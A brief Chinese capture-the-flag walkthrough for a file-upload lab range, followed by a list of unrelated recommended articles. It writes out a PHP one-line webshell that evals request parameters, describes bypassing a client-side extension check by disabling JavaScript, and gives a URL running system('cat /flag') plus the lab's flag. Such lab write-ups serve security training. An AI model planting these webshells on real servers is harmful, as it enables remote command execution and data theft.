Upload-Labs-Linux

靶场教程

1.访问页面,文件上传靶场。

2.编写一句话木马上传。另存为【PHP】文件

复制代码
<?php eval($_POST['upfile']); ?>   需要POST请求访问
修改为
<?php eval($_REQUEST['upfile']); ?>   可以在url直接访问

3.发现报错,不允许上传.php文件。

4.查看源码,禁用JavaScript ,并删除该内容。

注:禁用 JavaScript 可使用插件

5.文件上传成功,访问路径。

6.获取 flag , 修改后的一句话木马,可直接访问以下 url 获取 flag

复制代码
http://e24d2149-d2bd-41e0-8d4a-697f1cfb6a9e.node5.buuoj.cn:81/upload/upfile.php?upfile=system("cat /flag");

flag{17cbbe6d-8422-44a3-a2db-17d3eee8d502} 
相关推荐
IT小白杨11 分钟前
TikTok多账号运营体系安全运营攻略:移动端优先架构下的环境隔离技术解析
大数据·经验分享·tcp/ip·安全·架构·指纹浏览器
爱签AI电子合同24 分钟前
电子合同安全怎么测?加密与权限审计维度专项测评
安全
山东科恩光电33 分钟前
如何有效安装安全地毯以保障操作人员安全?
安全
妖孽白小白36 分钟前
el-select的内容续写实现
前端·vue.js·elementui
不可能片场1 小时前
Electron 主进程热补丁:单行 JS 安全打法
前端·electron
梨想橙汁1 小时前
Pinia 状态管理实战:定义 Store、修改数据、模块拆分
前端·vue.js
jimmyleeee1 小时前
大模型安全之十:LLM无界消耗(Unbounded Consumption)
人工智能·安全
高申航1 小时前
Vue 3 + DYMO Connect Framework 实战:从标签模板到打印服务的完整实现
前端·javascript·vue.js
梨想橙汁1 小时前
Vue3 组件开发:生命周期钩子,组件之间通信全方案
前端·vue.js
广东帝工智能安防1 小时前
景区水域安全预警方案:BCAS架构在旅游场景的适配与落地
人工智能·安全·三维激光雷达·景区安全·雷视融合